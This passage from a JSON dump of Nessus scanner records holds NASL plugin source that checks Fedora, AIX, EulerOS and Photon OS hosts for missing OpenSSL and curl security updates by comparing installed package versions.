script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"openssl-1.1.0g-1.fc26\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:openssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-08T15:10:21", "description": "The version of OpenSSL installed on the remote AIX host is affected by an off-by-one out-of-bounds read flaw in when processing X.509 certificates. This allows a context-dependent attacker to disclose limited memory contents.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2018-03-08T00:00:00", "type": "nessus", "title": "AIX OpenSSL Advisory : openssl_advisory24.asc", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix", "cpe:/a:openssl:openssl"], "id": "AIX_OPENSSL_ADVISORY24.NASL", "href": "https://www.tenable.com/plugins/nessus/107231", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107231);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-3735\");\n script_bugtraq_id(100515);\n\n script_name(english:\"AIX OpenSSL Advisory : openssl_advisory24.asc\");\n script_summary(english:\"Checks the version of the OpenSSL packages and iFixes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AIX host has a version of OpenSSL installed that is\naffected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of OpenSSL installed on the remote AIX host is affected by\nan off-by-one out-of-bounds read flaw in when processing X.509\ncertificates. This allows a context-dependent attacker to disclose\nlimited memory contents.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/openssl_advisory24.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available and can be downloaded from the IBM AIX website.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3735\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"AIX Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\ninclude(\"aix.inc\");include(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item(\"Host/AIX/version\");\nif (isnull(oslevel)) audit(AUDIT_OS_NOT, \"AIX\");\n\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This AIX package check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\noslevel = oslevel - \"AIX-\";\n\nif ( oslevel != \"5.3\" && oslevel != \"6.1\" && oslevel != \"7.1\" && oslevel != \"7.2\")\n{\n audit(AUDIT_OS_NOT, \"AIX 5.3 / 6.1 / 7.1 / 7.2\", \"AIX \" + oslevel);\n}\n\nflag = 0;\npackage = \"openssl.base\";\n\n# 1.0.2.1300\nif (aix_check_package(release:\"5.3\", package:package, minpackagever:\"1.0.2.500\", maxpackagever:\"1.0.2.1100\", fixpackagever:\"1.0.2.1300\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", package:package, minpackagever:\"1.0.2.500\", maxpackagever:\"1.0.2.1100\", fixpackagever:\"1.0.2.1300\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", package:package, minpackagever:\"1.0.2.500\", maxpackagever:\"1.0.2.1100\", fixpackagever:\"1.0.2.1300\") > 0) flag++;\nif (aix_check_package(release:\"7.2\", package:package, minpackagever:\"1.0.2.500\", maxpackagever:\"1.0.2.1100\", fixpackagever:\"1.0.2.1300\") > 0) flag++;\n\n# 20.13.102.1300\nif (aix_check_package(release:\"5.3\", package:package, minpackagever:\"20.13.102.1000\", maxpackagever:\"20.13.102.1100\", fixpackagever:\"20.13.102.1300\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", package:package, minpackagever:\"20.13.102.1000\", maxpackagever:\"20.13.102.1100\", fixpackagever:\"20.13.102.1300\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", package:package, minpackagever:\"20.13.102.1000\", maxpackagever:\"20.13.102.1100\", fixpackagever:\"20.13.102.1300\") > 0) flag++;\nif (aix_check_package(release:\"7.2\", package:package, minpackagever:\"20.13.102.1000\", maxpackagever:\"20.13.102.1100\", fixpackagever:\"20.13.102.1300\") > 0) flag++;\n\nif (flag)\n{\n aix_report_extra = ereg_replace(string:aix_report_get(), pattern:\"[()]\", replace:\"\");\n aix_report_extra = ereg_replace(string:aix_report_extra, pattern:\"[|]\", replace:\" or \");\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : aix_report_extra\n );\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, package);\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-08T15:06:16", "description": "Minor security update release 1.1.0g.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2018-01-15T00:00:00", "type": "nessus", "title": "Fedora 27 : 1:openssl (2017-4cf72e2c11)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:openssl", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-4CF72E2C11.NASL", "href": "https://www.tenable.com/plugins/nessus/105872", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-4cf72e2c11.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105872);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-3735\");\n script_xref(name:\"FEDORA\", value:\"2017-4cf72e2c11\");\n\n script_name(english:\"Fedora 27 : 1:openssl (2017-4cf72e2c11)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor security update release 1.1.0g.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-4cf72e2c11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"openssl-1.1.0g-1.fc27\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:openssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-07T15:35:53", "description": "According to the version of the openssl098e package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread.\n This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.(CVE-2017-3735)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2021-03-04T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.6 : openssl098e (EulerOS-SA-2021-1506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-03-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:openssl098e", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "id": "EULEROS_SA-2021-1506.NASL", "href": "https://www.tenable.com/plugins/nessus/147080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147080);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2017-3735\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : openssl098e (EulerOS-SA-2021-1506)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the openssl098e package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - While parsing an IPAddressFamily extension in an X.509\n certificate, it is possible to do a one-byte overread.\n This would result in an incorrect text display of the\n certificate. This bug has been present since 2006 and\n is present in all versions of OpenSSL before 1.0.2m and\n 1.1.0g.(CVE-2017-3735)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1506\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac220b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssl098e package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"openssl098e-0.9.8e-29.3.h11.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl098e\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-08T15:07:14", "description": "According to the version of the openssl098e package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The OpenSSL toolkit provides support for secure communications between machines. OpenSSL includes a certificate management tool and shared libraries which provide various cryptographic algorithms and protocols.Security Fix(es):While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate.\n This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.(CVE-2017-3735)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2021-02-04T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : openssl098e (EulerOS-SA-2021-1221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-03-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:openssl098e", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/146107", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146107);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/30\");\n\n script_cve_id(\n \"CVE-2017-3735\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : openssl098e (EulerOS-SA-2021-1221)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the openssl098e package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The OpenSSL toolkit provides support for secure\n communications between machines. OpenSSL includes a\n certificate management tool and shared libraries which\n provide various cryptographic algorithms and\n protocols.Security Fix(es):While parsing an\n IPAddressFamily extension in an X.509 certificate, it\n is possible to do a one-byte overread. This would\n result in an incorrect text display of the certificate.\n This bug has been present since 2006 and is present in\n all versions of OpenSSL before 1.0.2m and\n 1.1.0g.(CVE-2017-3735)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1221\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13cd7442\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssl098e package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"openssl098e-0.9.8e-29.3.h11.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl098e\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-03-27T15:17:52", "description": "An update of the curl package has been released.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Curl PHSA-2017-0044", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254", "CVE-2017-14970"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:curl", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0044_CURL.NASL", "href": "https://www.tenable.com/plugins/nessus/121756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0044. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121756);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2017-1000254\");\n\n script_name(english:\"Photon OS 1.0: Curl PHSA-2017-0044\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the curl package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-84.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14970\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"curl-7.54.0-4.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"curl-debuginfo-7.54.0-4.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": 